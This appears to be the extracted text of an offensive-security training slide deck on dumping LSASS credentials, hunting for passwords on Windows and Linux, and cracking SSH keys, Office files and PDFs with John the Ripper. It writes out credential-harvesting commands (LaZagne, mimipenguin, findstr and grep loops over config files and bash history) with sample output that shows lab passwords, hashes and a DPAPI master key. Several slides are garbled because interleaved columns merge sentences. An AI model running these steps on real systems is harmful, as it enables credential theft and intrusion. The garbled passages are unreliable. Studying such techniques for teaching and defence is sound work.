SHA1 password hashes associated with the bob SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
DPAPI: NA
user account's logon session stored in LSASS
process memory

Hassan
 Dumping LSASS Process Memory

WDIGEST
 WDIGEST is an older authentication protocol
enabled by default in Windows XP - Windows 8
and Windows Server 2003 - Windows Server == WDIGEST [14ab89]==
username bob
2012. LSASS caches credentials used by domainname DESKTOP-33E7O54
password None
WDIGEST in clear-text. This means if we find password (hex)
ourselves targeting a Windows system with
WDIGEST enabled, we will most likely see a
password in clear-text. Modern Windows
operating systems have WDIGEST disabled by
default
Hassan
 Dumping LSASS Process Memory

Kerberos
 Kerberos is a network authentication protocol
used by Active Directory in Windows Domain
environments. Domain user accounts are == Kerberos ==
Username: bob
granted tickets upon authentication with Active Domain: DESKTOP-33E7
Directory. This ticket is used to allow the user to
access shared resources on the network that It is possible to extract these from LSASS process memory and
use them to access other systems joined to the same domain.
they have been granted access to without
needing to type their credentials each time.
LSASS caches passwords, ekeys, tickets, and
pins associated with Kerberos
Hassan
 Dumping LSASS Process Memory

DPAPI
 The Data Protection Application Programming
Interface or DPAPI is a set of APIs in Windows
operating systems used to encrypt and decrypt == DPAPI [14ab89]==
luid 1354633
DPAPI data blobs on a per-user basis for key_guid 3e1d1091-b792-45df-ab8e-
c66af044d69b
Windows OS features and various third-party masterkey
applications. e8bc2faf77e7bd1891c0e49f0dea9d447a491107ef5b25b992907
1f68db5b0d55bf05df5a474d9bd94d98be4b4ddb690e6d8307a8
6be6f81be0d554f195fba92
sha1_masterkey
52e758b6120389898f7fae553ac8172b43221605

Hassan
 Dumping LSASS Process Memory

DPAPI
 Here are just a few examples of applications that use DPAPI and what they use it for:
Applications Use of DPAPI
Internet Explorer Password form auto-completion data (username and password for saved sites).
Google Chrome Password form auto-completion data (username and password for saved sites).
Outlook Passwords for email accounts.
Remote Desktop Connection Saved credentials for connections to remote machines.
Credential Manager Saved credentials for accessing shared resources, joining Wireless networks, VPNs
and more.

 Mimikatz and Pypykatz can extract the DPAPI masterkey for the logged-on user whose data is present
in LSASS process memory. This masterkey can then be used to decrypt the secrets associated with
each of the applications using DPAPI and result in the capturing of credentials for various accounts

Hassan
Credential Hunting in Windows

Hassan 89
 Credential Hunting in Windows

 Credential Hunting is the process of performing detailed searches across

the file system and through various applications to discover credentials
 A user may have documented their passwords somewhere on the system.
There may even be default credentials that could be found in various files.
It would be wise to base our search for credentials on what we know
about how the target system is being used

Hassan
 Key Terms to Search

Passwords Passphrases Keys

Username User account Creds
Users Passkeys Passphrases
configuration dbcredential dbpassword
pwd Login Credentials

Hassan
 Credential Hunting in Windows

 We can also take advantage of third-party tools like Lazagne to quickly

discover credentials that web browsers or other installed applications
may insecurely store. It would be beneficial to keep a standalone copy of
Lazagne on our attack host so we can quickly transfer it over to the target

Hassan
 Credential Hunting in Windows

C:\Users\bob\Desktop> start lazagne.exe all

 This will execute Lazagne and run all included modules. We can include
the option -vv to study what it is doing in the background. Once we hit
enter, it will open another prompt and display the results

Hassan
 Using findstr

 We can also use findstr to search from patterns across many types of files.
Keeping in mind common key terms, we can use variations of this
command to discover credentials on a Windows target:
C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Hassan
Credential Hunting in Linux

Hassan 95
 Credential Hunting in Linux

 There are several sources that can provide us with credentials that we put
in four categories
Files History Memory Key-Rings
Configs Logs Cache Browser
stored
credentials
Databases Command- In-memory
line History Processing
Notes
Scripts
Source codes
Cronjobs
SSH Keys
Hassan
 Files

 One core principle of Linux is that everything is a file. Therefore, it is

crucial to keep this concept in mind and search, find and filter the
appropriate files according to our requirements. We should look for, find,
and inspect several categories of files one by one
 Configuration files are the core of the functionality of services on Linux
distributions. Often they even contain credentials that we will be able to
read. Usually, the configuration files are marked with the following three
file extensions (.config, .conf, .cnf)
Hassan
 Files
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

1.Loop Start: for l in $(echo ".conf .config .cnf"); do

•This loop begins a loop over the list of file extensions provided (.conf, .config, .cnf).
•The list of extensions is echoed and then passed to the for loop.
2.Inside the Loop:
•Print File Extension: echo -e "\nFile extension: " $l
•This prints the file extension currently being processed ($l) to the terminal.
•The -e flag allows interpretation of escape sequences like \n for a newline.
•Find Files: find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core"
•find / -name *$l 2>/dev/null:
•This command finds all files in the system (/) that end with the extension $l (either .conf, .config, or .cnf).
•The 2>/dev/null redirects standard error to /dev/null, suppressing any error messages.
•| grep -v "lib\|fonts\|share\|core":
•The output from find is piped to grep.
•grep filters out any lines that contain the substrings "lib", "fonts", "share", or "core" using the -v flag, which tells it to exclude lines containing those patterns.
3.Loop End: done

Hassan
 Files
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

Hassan
 Files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done

Another option is to
run the scan directly
for each file found
with the specified file
extension and output
the contents. In this
example, we search
for three words (user,
password, pass) in
each file with the file
extension .cnf.

Hassan
 Files
grep -ir telnet

Hassan
 History

 In the history of the commands entered on Linux distributions that use

Bash as a standard shell, we find the associated files in .bash_history.
Nevertheless, other files like .bashrc or .bash_profile can contain
important information cry0l1t3@unixclient:~$ tail -n5 /home/*/.bash*

==> /home/cry0l1t3/.bash_history <==

vim ~/testing.txt
vim ~/testing.txt
chmod 755 /tmp/api.py
su
/tmp/api.py cry0l1t3 6mX4UP1eWH3HXK

==> /home/cry0l1t3/.bashrc <==

. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi

Hassan
 Logs

 An essential concept of Linux systems is log files that are stored in text
files. Many programs, especially all services and the system itself, write
such files. In them, we find system errors, detect problems regarding
services or follow what the system is doing in the background. The
entirety of log files can be divided into four categories:

Application
Logs Event Logs Service Logs System Logs

Hassan
 Logs

Log File Description

/var/log/messages Generic system activity logs.
/var/log/syslog Generic system activity logs.
/var/log/auth.log (Debian) All authentication related logs.

/var/log/secure (RedHat/CentOS) All authentication related

logs.
/var/log/boot.log Booting information.
/var/log/dmesg Hardware and drivers related information
and logs.
/var/log/kern.log Kernel related warnings, errors and logs.

/var/log/faillog Failed login attempts.

/var/log/cron Information related to cron jobs.

/var/log/mail.log All mail server related logs.

/var/log/httpd All Apache related logs.
/var/log/mysqld.log All MySQL server related logs.

Hassan
 Memory and Cache

 Many applications and processes work with credentials needed for

authentication and store them either in memory or in files so that they
can be reused. For example, it may be the system-required credentials for
the logged-in users. Another example is the credentials stored in the
browsers, which can also be read. In order to retrieve this type of
information from Linux distributions, there is a tool called mimipenguin
that makes the whole process easier. However, this tool requires
administrator/root permissions.
Hassan
 Memory and Cache

cry0l1t3@unixclient:~$ sudo python3 mimipenguin.py

[sudo] password for cry0l1t3:

[SYSTEM - GNOME] cry0l1t3:WLpAEXFa0SbqOHY

cry0l1t3@unixclient:~$ sudo bash mimipenguin.sh

[sudo] password for cry0l1t3:

MimiPenguin Results:
[SYSTEM - GNOME] cry0l1t3:WLpAEXFa0SbqOHY

Hassan
 Memory and Cache

 An even more powerful tool we can use that was mentioned earlier in the
Credential Hunting in Windows section is LaZagne
cry0l1t3@unixclient:~$ sudo python2.7 laZagne.py all

|====================================================================|
| |
| The LaZagne Project |
| |
| ! BANG BANG ! |
| |
|====================================================================|

------------------- Shadow passwords -----------------

[+] Hash found !!!

Login: systemd-coredump
Hash: !!:18858::::::

[+] Hash found !!!

Login: sambauser
Hash: $6$wgK4tGq7Jepa.V0g$QkxvseL.xkC3jo682xhSGoXXOGcBwPLc2CrAPugD6PYXWQlBkiwwFs7x/fhI.8negiUSPqaWyv7wC8uwsWPrx1:18862:0:99999:7:::

[+] Password found !!!

Login: cry0l1t3
Password: WLpAEXFa0SbqOHY

Hassan
Cracking Files Passwords

Hassan 108
 Cracking with John

 John The Ripper has many different scripts to generate hashes from files
that we can then use for cracking. We can find these scripts on our system
ammar@htb[/htb]$ locate *2john*
using the following command. /usr/bin/bitlocker2john
/usr/bin/dmg2john
/usr/bin/gpg2john
/usr/bin/hccap2john
/usr/bin/keepass2john
/usr/bin/putty2john
/usr/bin/racf2john
/usr/bin/rar2john
/usr/bin/zip2john
/usr/share/john/1password2john.py
/usr/share/john/7z2john.pl
/usr/share/john/DPAPImk2john.py
/usr/share/john/adxcsouf2john.py
/usr/share/john/aem2john.py

Hassan
 Cracking SSH Keys

ammar@htb[/htb]$ ssh2john.py SSH.private > ssh.hash

ammar@htb[/htb]$ cat ssh.hash

ssh.private:$sshng$0$8$1C258238FD2D6EB0$2352$f7b...SNIP...

ammar@htb[/htb]$ john --wordlist=rockyou.txt ssh.hash

Using default input encoding: UTF-8

Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
1234 (SSH.private)
1g 0:00:00:00 DONE (2022-02-08 03:03) 16.66g/s 1747Kp/s 1747Kc/s 1747KC/s Knightsing..Babying
Session completed

Hassan
 Cracking Microsoft Office Documents

ammar@htb[/htb]$ office2john.py Protected.docx > protected-docx.hash

ammar@htb[/htb]$ cat protected-docx.hash

Protected.docx:$office$*2007*20*128*16*7240...SNIP...8a69cf1*98242f4da37d916305d8e2821
360773b7edc481b

ammar@htb[/htb]$ john --wordlist=rockyou.txt protected-docx.hash

Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234 (Protected.docx)
1g 0:00:00:00 DONE (2022-02-08 01:25) 2.083g/s 2266p/s 2266c/s 2266C/s trisha..heart
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Hassan
 Cracking PDFs
ammar@htb[/htb]$ pdf2john.py PDF.pdf > pdf.hash
ammar@htb[/htb]$ cat pdf.hash

PDF.pdf:$pdf$2*3*128*-
1028*1*16*7e88...SNIP...bd2*32*a72092...SNIP...0000*32*c48f001fdc79a030d718d
f5dbbdaad81d1f6fedec4a7b5cd980d64139edfcb7e

ammar@htb[/htb]$ john --wordlist=rockyou.txt pdf.hash

Using default input encoding: UTF-8

Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 3 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234 (PDF.pdf)
1g 0:00:00:00 DONE (2022-02-08 02:16) 25.00g/s 27200p/s 27200c/s 27200C/s bulldogs..heart
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed
Hassan
Thanks

Hassan 113